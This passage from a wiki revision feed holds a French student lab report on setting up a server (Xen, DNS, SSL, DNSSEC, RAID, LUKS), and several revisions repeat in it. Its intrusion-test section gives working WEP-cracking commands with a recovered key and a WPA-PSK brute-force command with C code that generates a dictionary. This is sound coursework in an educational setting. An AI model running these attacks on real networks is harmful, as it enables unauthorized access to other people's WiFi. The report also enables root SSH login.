=== Chiffrement de données ===&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, nous formatons notre clé USB afin de pouvoir utiliser les partitions:&lt;br /&gt;
&lt;br /&gt;
 df -h&lt;br /&gt;
&lt;br /&gt;
Nous connaissons ainsi notre Filesystem:&lt;br /&gt;
&lt;br /&gt;
 fdisk /dev/sdb&lt;br /&gt;
&lt;br /&gt;
Nous pouvons créer une nouvelle partition primaire de la taille de la clé USB, 7.2 Go.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Puis nous quittons fdisk mais nous devons exécuter la commande&lt;br /&gt;
&lt;br /&gt;
 partprobe &lt;br /&gt;
&lt;br /&gt;
Pour re-écrire dans la table de partition.&lt;br /&gt;
&lt;br /&gt;
Nous commençons l'initialisations de notre clé cryptée &lt;br /&gt;
&lt;br /&gt;
 sudo cryptsetup luksFormat  /dev/sdb1&lt;br /&gt;
&lt;br /&gt;
 sudo cryptsetup luksOpen /dev/sdb1 home&lt;br /&gt;
&lt;br /&gt;
Nous pouvons accéder à notre clé depuis &lt;br /&gt;
&lt;br /&gt;
 cd /media/pifou/665....62/&lt;br /&gt;
&lt;br /&gt;
Nous avons créé un fichier test en sudo à la racine.&lt;br /&gt;
 &lt;br /&gt;
 sudo cryptsetup luksClose home &lt;br /&gt;
&lt;br /&gt;
Cette commande permet de fermer notre clé cryptée.&lt;br /&gt;
&lt;br /&gt;
== Site Web ==&lt;br /&gt;
&lt;br /&gt;
Achat de clavaire.site[https://www.clavaire.site] sur gandi&lt;br /&gt;
&lt;br /&gt;
Ajout de notre propre DNS : ns1.gandi.net avec un lien direct (glue records) vers notre ip publique de machine.&lt;/div&gt;</summary>
		<author><name>Tmertz</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G3&amp;diff=54154</id>
		<title>TP sysres IMA5sc 2020/2021 G3</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G3&amp;diff=54154"/>
				<updated>2020-11-30T16:47:31Z</updated>
		
		<summary type="html">&lt;p&gt;Tmertz : /* Attaque de type &amp;quot;homme au milieu&amp;quot; par usurpation ARP */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;TP PRA - SIMONIN/MERTZ - Clavaire&lt;br /&gt;
&lt;br /&gt;
== Informations générales ==&lt;br /&gt;
&lt;br /&gt;
 Hostname : Clavaire&lt;br /&gt;
 IP local : 100.64.0.25/28&lt;br /&gt;
 IP publique : 193.48.57.186/28&lt;br /&gt;
 URL : www.clavaire.site&lt;br /&gt;
&lt;br /&gt;
== Installation VirtualMachine ==&lt;br /&gt;
&lt;br /&gt;
Utilisation de xen pour créer notre machine virtuel sur capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
 xen-create-image --hostname=clavaire --ip=100.64.0.25 --netmask=255.255.255.0 --gateway=100.64.0.5 --password=[pwd habituel] --dir=/usr/local/xen --dist=buster&lt;br /&gt;
&lt;br /&gt;
Lancement de la VM puis connexion :&lt;br /&gt;
 xl create -c /etc/xen/clavaire.cfg&lt;br /&gt;
 xen console clavaire&lt;br /&gt;
&lt;br /&gt;
''Pour quitter la VM : CTRL + ]''&lt;br /&gt;
&lt;br /&gt;
On ajoute des disques à notre VM :&lt;br /&gt;
&lt;br /&gt;
//rename disque et formatage (lvrename/mkfs)&lt;br /&gt;
&lt;br /&gt;
//modif .cfg pour ajouter disques&lt;br /&gt;
&lt;br /&gt;
//transfert fichier /var vers nouvelle partition&lt;br /&gt;
&lt;br /&gt;
//ajoute au /etc/fstab les disques&lt;br /&gt;
&lt;br /&gt;
//mount -a&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Routage du site IPv4 ==&lt;br /&gt;
&lt;br /&gt;
Dans VM : /etc/network/interfaces&lt;br /&gt;
&lt;br /&gt;
iface eth0 inet static&lt;br /&gt;
 address 193.48.57.186&lt;br /&gt;
 netmask 255.255.255.255&lt;br /&gt;
 up ip address add dev eth0 100.64.0.26/24&lt;br /&gt;
 up ip route add default via 100.64.0.2 src 193.48.57.186&lt;br /&gt;
 down ip address del dev eth0 100.64.0.26/24&lt;br /&gt;
 down ip route del default via 100.64.0.2 src 193.48.57.186&lt;br /&gt;
&lt;br /&gt;
Dans gateway&lt;br /&gt;
&lt;br /&gt;
1. ssh zabeth09 et zabeth30&lt;br /&gt;
&lt;br /&gt;
2. minicom -&amp;gt; /dev/ttyACM0 et /dev/ttyUSB0&lt;br /&gt;
&lt;br /&gt;
3. enable&lt;br /&gt;
&lt;br /&gt;
4. conf t&lt;br /&gt;
&lt;br /&gt;
5. ip route 193.48.57.186 255.255.255.255 100.64.0.26&lt;br /&gt;
&lt;br /&gt;
6. exit&lt;br /&gt;
&lt;br /&gt;
7. write&lt;br /&gt;
&lt;br /&gt;
== Services Internet ==&lt;br /&gt;
=== SSH ===&lt;br /&gt;
modif /etc/ssh/sshd_config :&lt;br /&gt;
&lt;br /&gt;
 Changement port : PORT 2222&lt;br /&gt;
 Login depuis root : PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
service ssh restart&lt;br /&gt;
&lt;br /&gt;
on peut donc :&lt;br /&gt;
ssh root@193.48.57.186 -p 2222&lt;br /&gt;
&lt;br /&gt;
=== DNS ===&lt;br /&gt;
Ajout DNS :&lt;br /&gt;
&lt;br /&gt;
- le faire dans gandi&lt;br /&gt;
- modifier fichier /etc/bind/named.conf.local en ajoutant :&lt;br /&gt;
 zone &amp;quot;clavaire.site&amp;quot; IN {&lt;br /&gt;
 	type master;&lt;br /&gt;
 	file &amp;quot;/etc/bind/db.clavaire.lan&amp;quot;;&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
- puis avoir un ficher db.clavaire.lan :&lt;br /&gt;
 ;&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA     ns1.clavaire.site. admin.clavaire.site. (&lt;br /&gt;
                               8         ; Serial&lt;br /&gt;
                          604800         ; Refresh&lt;br /&gt;
                           86400         ; Retry&lt;br /&gt;
                         2419200         ; Expire&lt;br /&gt;
                          604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns1.clavaire.site.&lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 @       IN      MX      100 clavaire.site.&lt;br /&gt;
 ns1     IN      A       193.48.57.186&lt;br /&gt;
 www     IN      A       193.48.57.186&lt;br /&gt;
&lt;br /&gt;
- relancer bind : &lt;br /&gt;
 service bind9 restart&lt;br /&gt;
&lt;br /&gt;
- pour vérifier :&lt;br /&gt;
 host -tany clavaire.site&lt;br /&gt;
&lt;br /&gt;
=== Sécurisation site web par certificat ===&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, nous avons créé un serveur apache2,&lt;br /&gt;
&lt;br /&gt;
 systemctl start apache2&lt;br /&gt;
&lt;br /&gt;
Nous avons ajouté à la liste des ports, le module ssl en écoute sur le port 443&lt;br /&gt;
&lt;br /&gt;
Ajout du certificat SSL&lt;br /&gt;
&lt;br /&gt;
Tout d'abord, nous avons installé openssl puis nous avons créé une nouvelle clé &lt;br /&gt;
&lt;br /&gt;
 La commande est disponible par mail: simoninrichard@gmail.com&lt;br /&gt;
 &lt;br /&gt;
Nous avons deplacé la clé dans private puis nous avons donné la clé public à Gandi pour générer le fichier&lt;br /&gt;
&lt;br /&gt;
Pour la sécurisation SSl, nous avons utilisé le un serveur mail sur notre VM, mailx.&lt;br /&gt;
&lt;br /&gt;
Pour notre serveur mail, nous avons configuré un chemin de sauvegarde de mail Maildir/, qui ne correspond pas au chemin courant.&lt;br /&gt;
&lt;br /&gt;
 mailx -f Maildir/&lt;br /&gt;
&lt;br /&gt;
Nous avons aussi ajouté un alias afin de recéptionner les mails en admin et non en root.&lt;br /&gt;
&lt;br /&gt;
A l'aide du serveur mail, nous avons pu valider les différentes etapes de validation SSL&lt;br /&gt;
&lt;br /&gt;
Nous devons ensuite activer nos certificats SSL&lt;br /&gt;
&lt;br /&gt;
 a2enmod ssl&lt;br /&gt;
&lt;br /&gt;
Ensuite nous avons modifié notre fichier de conf de notre site: clavaire.site.conf, pour ajouté nos chemins de fichiers de certificat SSL.&lt;br /&gt;
&lt;br /&gt;
Puis un petit restart et notre site est sécurisé.&lt;br /&gt;
&lt;br /&gt;
=== Sécurisation de serveur DNS par DNSSEC ===&lt;br /&gt;
&lt;br /&gt;
Nous avons suivi les différentes étapes du sujet de TP. Nous avons choisis comme nom de zone: clavaire.site.&lt;br /&gt;
&lt;br /&gt;
Nous avons vérifié le bon fonctionnement à l'aide de :&lt;br /&gt;
&lt;br /&gt;
 https://dnsviz.net/d/clavaire.site/dnssec/&lt;br /&gt;
&lt;br /&gt;
== Tests d’intrusion ==&lt;br /&gt;
&lt;br /&gt;
=== Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
 &lt;br /&gt;
Dans cette partie, nous avons utilisé le reseau cracotte03 avec un cryptage WEP.&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps nous avons annalysé nos interfaces avec  &lt;br /&gt;
&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
Le résultat obtenue est&lt;br /&gt;
&lt;br /&gt;
 PHY	 Interface	Driver		Chipset&lt;br /&gt;
 phy0	wlx40a5ef0f6518	rt2800usb	Ralink Technology, Corp. RT5370&lt;br /&gt;
&lt;br /&gt;
Nous obtenons ainsi l'interface de la clé WI-PI.&lt;br /&gt;
Nous démarrons notre interface réseau WIFI pour pouvoir commencer l'écoute sur le channel 3.&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlx40a5ef0f6518 3&lt;br /&gt;
&lt;br /&gt;
Ainsi nous commençons à injecter dans notre réseau à l'aide du bssid de notre WIFI.&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng -9 -e cracotte03 -a 04:DA:D2:9C:50:52 wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Nous commençons à capturer les VI sur notre point d'accès à l'aide de la commande&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 3 --bssid 04:DA:D2:9C:50:52 -w test.txt wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
En même temps, nous effectuons des fausses authentification afin d'augmenter le traffic sur notre point d'accès&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng -1 0 -e cracotte03 -a 04:DA:D2:9C:50:52  wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Puis nous utilisons aircrack afin d'utiliser tous les Vi pour cracker la clé WEP&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng -b 04:DA:D2:9C:50:52 test*.cap &lt;br /&gt;
&lt;br /&gt;
et nous obtenons notre clé pour la cracotte03&lt;br /&gt;
&lt;br /&gt;
 KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:00:00:0F:FF ] &lt;br /&gt;
 Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
=== Exploitation de failles du système === &lt;br /&gt;
=== Cassage de mot de passe WPA-PSK par force brute ===&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, nous avons du trouvé le reseau wifi à cracker en scannant le reseau.&lt;br /&gt;
&lt;br /&gt;
Nous avons pu ainsi attendre une connexion sur le reseau pour récupérer un Handshake grace à airdump.&lt;br /&gt;
&lt;br /&gt;
Une fois les fichiers acquis, nous avons lancé sur un PC fixe plus puissant, la commande de crack par brute force.&lt;br /&gt;
&lt;br /&gt;
aircrack-ng -w fichierbruteforce.txt -b 00:24:0A:F2:C0:18 psk*.cap&lt;br /&gt;
&lt;br /&gt;
Code c pour générer le dictionnaire :&lt;br /&gt;
&lt;br /&gt;
 #include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
 #include &amp;lt;stdlib.h&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
 int main(){&lt;br /&gt;
     FILE *f;&lt;br /&gt;
     f = fopen(&amp;quot;fichierbruteforce.txt&amp;quot;,&amp;quot;w&amp;quot;);&lt;br /&gt;
     if(f==NULL){&lt;br /&gt;
         printf(&amp;quot;Erreur lors de l'ouverture c'un fichier&amp;quot;);&lt;br /&gt;
         exit(1);&lt;br /&gt;
     }&lt;br /&gt;
 &lt;br /&gt;
     for(char a=0; a&amp;lt;10;a++)&lt;br /&gt;
     {&lt;br /&gt;
         for(char z=0; z&amp;lt;10;z++)&lt;br /&gt;
         {&lt;br /&gt;
             for(char e=0; e&amp;lt;10;e++)&lt;br /&gt;
             {&lt;br /&gt;
                 for(char r=0; r&amp;lt;10;r++)&lt;br /&gt;
                 {&lt;br /&gt;
                     for(char t=0; t&amp;lt;10;t++)&lt;br /&gt;
                     {&lt;br /&gt;
                         for(char y=0; y&amp;lt;10;y++)&lt;br /&gt;
                         {&lt;br /&gt;
                             for(char u=0; u&amp;lt;10;u++)&lt;br /&gt;
                             {&lt;br /&gt;
                                 for(char i=0; i&amp;lt;10;i++)&lt;br /&gt;
                                 {&lt;br /&gt;
                                     //printf(&amp;quot;%d%d%d%d%d%d%d%d\n&amp;quot;,a,z,e,r,t,y,u,i);&lt;br /&gt;
                                     fprintf(f,&amp;quot;%d%d%d%d%d%d%d%d\n&amp;quot;,a,z,e,r,t,y,u,i);&lt;br /&gt;
                                 }&lt;br /&gt;
                             }&lt;br /&gt;
                         }&lt;br /&gt;
                     }&lt;br /&gt;
                 }&lt;br /&gt;
             }&lt;br /&gt;
         }&lt;br /&gt;
     }&lt;br /&gt;
     fclose(f);&lt;br /&gt;
     return 0;&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
=== Attaque de type &amp;quot;homme au milieu&amp;quot; par usurpation ARP ===&lt;br /&gt;
 sysctl -w net.ipv4.ip_forward=1&lt;br /&gt;
&lt;br /&gt;
=== Intrusion sur un serveur d’application Web ===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Réalisations ==&lt;br /&gt;
&lt;br /&gt;
=== Sécurisation de données ===&lt;br /&gt;
&lt;br /&gt;
On crée 3 disques virtuel de 1G (lvcreate -L1G -nclavaire-raid1 storage) et on les ajoute au fichier de config.&lt;br /&gt;
On peut créer le raid :&lt;br /&gt;
 mdadm --create /dev/md0 --level=5 --raid-devices=3 /dev/xvda5 /dev/xvda6 /dev/xvda7&lt;br /&gt;
 mkfs.ext4 /dev/md0&lt;br /&gt;
&lt;br /&gt;
Pour qu'il soit monté a chaque démarrage de la vm : &lt;br /&gt;
 mdadm --monitor --daemonise /dev/md0&lt;br /&gt;
&lt;br /&gt;
Et on l'ajoute au fichier /etc/fstab&lt;br /&gt;
&lt;br /&gt;
Avec des fichiers dans le ce volume, meme si un disque est déconnecté, les données sont toujours disponible.&lt;br /&gt;
&lt;br /&gt;
=== Chiffrement de données ===&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, nous formatons notre clé USB afin de pouvoir utiliser les partitions:&lt;br /&gt;
&lt;br /&gt;
 df -h&lt;br /&gt;
&lt;br /&gt;
Nous connaissons ainsi notre Filesystem:&lt;br /&gt;
&lt;br /&gt;
 fdisk /dev/sdb&lt;br /&gt;
&lt;br /&gt;
Nous pouvons créer une nouvelle partition primaire de la taille de la clé USB, 7.2 Go.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Puis nous quittons fdisk mais nous devons exécuter la commande&lt;br /&gt;
&lt;br /&gt;
 partprobe &lt;br /&gt;
&lt;br /&gt;
Pour re-écrire dans la table de partition.&lt;br /&gt;
&lt;br /&gt;
Nous commençons l'initialisations de notre clé cryptée &lt;br /&gt;
&lt;br /&gt;
 sudo cryptsetup luksFormat  /dev/sdb1&lt;br /&gt;
&lt;br /&gt;
 sudo cryptsetup luksOpen /dev/sdb1 home&lt;br /&gt;
&lt;br /&gt;
Nous pouvons accéder à notre clé depuis &lt;br /&gt;
&lt;br /&gt;
 cd /media/pifou/665....62/&lt;br /&gt;
&lt;br /&gt;
Nous avons créé un fichier test en sudo à la racine.&lt;br /&gt;
 &lt;br /&gt;
 sudo cryptsetup luksClose home &lt;br /&gt;
&lt;br /&gt;
Cette commande permet de fermer notre clé cryptée.&lt;br /&gt;
&lt;br /&gt;
== Site Web ==&lt;br /&gt;
&lt;br /&gt;
Achat de clavaire.site[https://www.clavaire.site] sur gandi&lt;br /&gt;
&lt;br /&gt;
Ajout de notre propre DNS : ns1.gandi.net avec un lien direct (glue records) vers notre ip publique de machine.&lt;/div&gt;</summary>
		<author><name>Tmertz</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G3&amp;diff=54148</id>
		<title>TP sysres IMA5sc 2020/2021 G3</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G3&amp;diff=54148"/>
				<updated>2020-11-30T16:40:55Z</updated>
		
		<summary type="html">&lt;p&gt;Tmertz : /* Cassage de mot de passe WPA-PSK par force brute */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;TP PRA - SIMONIN/MERTZ - Clavaire&lt;br /&gt;
&lt;br /&gt;
== Informations générales ==&lt;br /&gt;
&lt;br /&gt;
 Hostname : Clavaire&lt;br /&gt;
 IP local : 100.64.0.25/28&lt;br /&gt;
 IP publique : 193.48.57.186/28&lt;br /&gt;
 URL : www.clavaire.site&lt;br /&gt;
&lt;br /&gt;
== Installation VirtualMachine ==&lt;br /&gt;
&lt;br /&gt;
Utilisation de xen pour créer notre machine virtuel sur capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
 xen-create-image --hostname=clavaire --ip=100.64.0.25 --netmask=255.255.255.0 --gateway=100.64.0.5 --password=[pwd habituel] --dir=/usr/local/xen --dist=buster&lt;br /&gt;
&lt;br /&gt;
Lancement de la VM puis connexion :&lt;br /&gt;
 xl create -c /etc/xen/clavaire.cfg&lt;br /&gt;
 xen console clavaire&lt;br /&gt;
&lt;br /&gt;
''Pour quitter la VM : CTRL + ]''&lt;br /&gt;
&lt;br /&gt;
On ajoute des disques à notre VM :&lt;br /&gt;
&lt;br /&gt;
//rename disque et formatage (lvrename/mkfs)&lt;br /&gt;
&lt;br /&gt;
//modif .cfg pour ajouter disques&lt;br /&gt;
&lt;br /&gt;
//transfert fichier /var vers nouvelle partition&lt;br /&gt;
&lt;br /&gt;
//ajoute au /etc/fstab les disques&lt;br /&gt;
&lt;br /&gt;
//mount -a&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Routage du site IPv4 ==&lt;br /&gt;
&lt;br /&gt;
Dans VM : /etc/network/interfaces&lt;br /&gt;
&lt;br /&gt;
iface eth0 inet static&lt;br /&gt;
 address 193.48.57.186&lt;br /&gt;
 netmask 255.255.255.255&lt;br /&gt;
 up ip address add dev eth0 100.64.0.26/24&lt;br /&gt;
 up ip route add default via 100.64.0.2 src 193.48.57.186&lt;br /&gt;
 down ip address del dev eth0 100.64.0.26/24&lt;br /&gt;
 down ip route del default via 100.64.0.2 src 193.48.57.186&lt;br /&gt;
&lt;br /&gt;
Dans gateway&lt;br /&gt;
&lt;br /&gt;
1. ssh zabeth09 et zabeth30&lt;br /&gt;
&lt;br /&gt;
2. minicom -&amp;gt; /dev/ttyACM0 et /dev/ttyUSB0&lt;br /&gt;
&lt;br /&gt;
3. enable&lt;br /&gt;
&lt;br /&gt;
4. conf t&lt;br /&gt;
&lt;br /&gt;
5. ip route 193.48.57.186 255.255.255.255 100.64.0.26&lt;br /&gt;
&lt;br /&gt;
6. exit&lt;br /&gt;
&lt;br /&gt;
7. write&lt;br /&gt;
&lt;br /&gt;
== Services Internet ==&lt;br /&gt;
=== SSH ===&lt;br /&gt;
modif /etc/ssh/sshd_config :&lt;br /&gt;
&lt;br /&gt;
 Changement port : PORT 2222&lt;br /&gt;
 Login depuis root : PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
service ssh restart&lt;br /&gt;
&lt;br /&gt;
on peut donc :&lt;br /&gt;
ssh root@193.48.57.186 -p 2222&lt;br /&gt;
&lt;br /&gt;
=== DNS ===&lt;br /&gt;
Ajout DNS :&lt;br /&gt;
&lt;br /&gt;
- le faire dans gandi&lt;br /&gt;
- modifier fichier /etc/bind/named.conf.local en ajoutant :&lt;br /&gt;
 zone &amp;quot;clavaire.site&amp;quot; IN {&lt;br /&gt;
 	type master;&lt;br /&gt;
 	file &amp;quot;/etc/bind/db.clavaire.lan&amp;quot;;&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
- puis avoir un ficher db.clavaire.lan :&lt;br /&gt;
 ;&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA     ns1.clavaire.site. admin.clavaire.site. (&lt;br /&gt;
                               8         ; Serial&lt;br /&gt;
                          604800         ; Refresh&lt;br /&gt;
                           86400         ; Retry&lt;br /&gt;
                         2419200         ; Expire&lt;br /&gt;
                          604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns1.clavaire.site.&lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 @       IN      MX      100 clavaire.site.&lt;br /&gt;
 ns1     IN      A       193.48.57.186&lt;br /&gt;
 www     IN      A       193.48.57.186&lt;br /&gt;
&lt;br /&gt;
- relancer bind : &lt;br /&gt;
 service bind9 restart&lt;br /&gt;
&lt;br /&gt;
- pour vérifier :&lt;br /&gt;
 host -tany clavaire.site&lt;br /&gt;
&lt;br /&gt;
=== Sécurisation site web par certificat ===&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, nous avons créé un serveur apache2,&lt;br /&gt;
&lt;br /&gt;
 systemctl start apache2&lt;br /&gt;
&lt;br /&gt;
Nous avons ajouté à la liste des ports, le module ssl en écoute sur le port 443&lt;br /&gt;
&lt;br /&gt;
Ajout du certificat SSL&lt;br /&gt;
&lt;br /&gt;
Tout d'abord, nous avons installé openssl puis nous avons créé une nouvelle clé &lt;br /&gt;
&lt;br /&gt;
 La commande est disponible par mail: simoninrichard@gmail.com&lt;br /&gt;
 &lt;br /&gt;
Nous avons deplacé la clé dans private puis nous avons donné la clé public à Gandi pour générer le fichier&lt;br /&gt;
&lt;br /&gt;
Pour la sécurisation SSl, nous avons utilisé le un serveur mail sur notre VM, mailx.&lt;br /&gt;
&lt;br /&gt;
Pour notre serveur mail, nous avons configuré un chemin de sauvegarde de mail Maildir/, qui ne correspond pas au chemin courant.&lt;br /&gt;
&lt;br /&gt;
 mailx -f Maildir/&lt;br /&gt;
&lt;br /&gt;
Nous avons aussi ajouté un alias afin de recéptionner les mails en admin et non en root.&lt;br /&gt;
&lt;br /&gt;
A l'aide du serveur mail, nous avons pu valider les différentes etapes de validation SSL&lt;br /&gt;
&lt;br /&gt;
Nous devons ensuite activer nos certificats SSL&lt;br /&gt;
&lt;br /&gt;
 a2enmod ssl&lt;br /&gt;
&lt;br /&gt;
Ensuite nous avons modifié notre fichier de conf de notre site: clavaire.site.conf, pour ajouté nos chemins de fichiers de certificat SSL.&lt;br /&gt;
&lt;br /&gt;
Puis un petit restart et notre site est sécurisé.&lt;br /&gt;
&lt;br /&gt;
=== Sécurisation de serveur DNS par DNSSEC ===&lt;br /&gt;
&lt;br /&gt;
Nous avons suivi les différentes étapes du sujet de TP. Nous avons choisis comme nom de zone: clavaire.site.&lt;br /&gt;
&lt;br /&gt;
Nous avons vérifié le bon fonctionnement à l'aide de :&lt;br /&gt;
&lt;br /&gt;
 https://dnsviz.net/d/clavaire.site/dnssec/&lt;br /&gt;
&lt;br /&gt;
== Tests d’intrusion ==&lt;br /&gt;
&lt;br /&gt;
=== Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
 &lt;br /&gt;
Dans cette partie, nous avons utilisé le reseau cracotte03 avec un cryptage WEP.&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps nous avons annalysé nos interfaces avec  &lt;br /&gt;
&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
Le résultat obtenue est&lt;br /&gt;
&lt;br /&gt;
 PHY	 Interface	Driver		Chipset&lt;br /&gt;
 phy0	wlx40a5ef0f6518	rt2800usb	Ralink Technology, Corp. RT5370&lt;br /&gt;
&lt;br /&gt;
Nous obtenons ainsi l'interface de la clé WI-PI.&lt;br /&gt;
Nous démarrons notre interface réseau WIFI pour pouvoir commencer l'écoute sur le channel 3.&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlx40a5ef0f6518 3&lt;br /&gt;
&lt;br /&gt;
Ainsi nous commençons à injecter dans notre réseau à l'aide du bssid de notre WIFI.&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng -9 -e cracotte03 -a 04:DA:D2:9C:50:52 wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Nous commençons à capturer les VI sur notre point d'accès à l'aide de la commande&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 3 --bssid 04:DA:D2:9C:50:52 -w test.txt wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
En même temps, nous effectuons des fausses authentification afin d'augmenter le traffic sur notre point d'accès&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng -1 0 -e cracotte03 -a 04:DA:D2:9C:50:52  wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Puis nous utilisons aircrack afin d'utiliser tous les Vi pour cracker la clé WEP&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng -b 04:DA:D2:9C:50:52 test*.cap &lt;br /&gt;
&lt;br /&gt;
et nous obtenons notre clé pour la cracotte03&lt;br /&gt;
&lt;br /&gt;
 KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:00:00:0F:FF ] &lt;br /&gt;
 Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
=== Exploitation de failles du système === &lt;br /&gt;
=== Cassage de mot de passe WPA-PSK par force brute ===&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, nous avons du trouvé le reseau wifi à cracker en scannant le reseau.&lt;br /&gt;
&lt;br /&gt;
Nous avons pu ainsi attendre une connexion sur le reseau pour récupérer un Handshake grace à airdump.&lt;br /&gt;
&lt;br /&gt;
Une fois les fichiers acquis, nous avons lancé sur un PC fixe plus puissant, la commande de crack par brute force.&lt;br /&gt;
&lt;br /&gt;
aircrack-ng -w fichierbruteforce.txt -b 00:24:0A:F2:C0:18 psk*.cap&lt;br /&gt;
&lt;br /&gt;
Code c pour générer le dictionnaire :&lt;br /&gt;
&lt;br /&gt;
 #include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
 #include &amp;lt;stdlib.h&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
 int main(){&lt;br /&gt;
     FILE *f;&lt;br /&gt;
     f = fopen(&amp;quot;fichierbruteforce.txt&amp;quot;,&amp;quot;w&amp;quot;);&lt;br /&gt;
     if(f==NULL){&lt;br /&gt;
         printf(&amp;quot;Erreur lors de l'ouverture c'un fichier&amp;quot;);&lt;br /&gt;
         exit(1);&lt;br /&gt;
     }&lt;br /&gt;
 &lt;br /&gt;
     for(char a=0; a&amp;lt;10;a++)&lt;br /&gt;
     {&lt;br /&gt;
         for(char z=0; z&amp;lt;10;z++)&lt;br /&gt;
         {&lt;br /&gt;
             for(char e=0; e&amp;lt;10;e++)&lt;br /&gt;
             {&lt;br /&gt;
                 for(char r=0; r&amp;lt;10;r++)&lt;br /&gt;
                 {&lt;br /&gt;
                     for(char t=0; t&amp;lt;10;t++)&lt;br /&gt;
                     {&lt;br /&gt;
                         for(char y=0; y&amp;lt;10;y++)&lt;br /&gt;
                         {&lt;br /&gt;
                             for(char u=0; u&amp;lt;10;u++)&lt;br /&gt;
                             {&lt;br /&gt;
                                 for(char i=0; i&amp;lt;10;i++)&lt;br /&gt;
                                 {&lt;br /&gt;
                                     //printf(&amp;quot;%d%d%d%d%d%d%d%d\n&amp;quot;,a,z,e,r,t,y,u,i);&lt;br /&gt;
                                     fprintf(f,&amp;quot;%d%d%d%d%d%d%d%d\n&amp;quot;,a,z,e,r,t,y,u,i);&lt;br /&gt;
                                 }&lt;br /&gt;
                             }&lt;br /&gt;
                         }&lt;br /&gt;
                     }&lt;br /&gt;
                 }&lt;br /&gt;
             }&lt;br /&gt;
         }&lt;br /&gt;
     }&lt;br /&gt;
     fclose(f);&lt;br /&gt;
     return 0;&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
=== Attaque de type &amp;quot;homme au milieu&amp;quot; par usurpation ARP === &lt;br /&gt;
=== Intrusion sur un serveur d’application Web ===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Réalisations ==&lt;br /&gt;
&lt;br /&gt;
=== Sécurisation de données ===&lt;br /&gt;
&lt;br /&gt;
On crée 3 disques virtuel de 1G (lvcreate -L1G -nclavaire-raid1 storage) et on les ajoute au fichier de config.&lt;br /&gt;
On peut créer le raid :&lt;br /&gt;
 mdadm --create /dev/md0 --level=5 --raid-devices=3 /dev/xvda5 /dev/xvda6 /dev/xvda7&lt;br /&gt;
 mkfs.ext4 /dev/md0&lt;br /&gt;
&lt;br /&gt;
Pour qu'il soit monté a chaque démarrage de la vm : &lt;br /&gt;
 mdadm --monitor --daemonise /dev/md0&lt;br /&gt;
&lt;br /&gt;
Et on l'ajoute au fichier /etc/fstab&lt;br /&gt;
&lt;br /&gt;
Avec des fichiers dans le ce volume, meme si un disque est déconnecté, les données sont toujours disponible.&lt;br /&gt;
&lt;br /&gt;
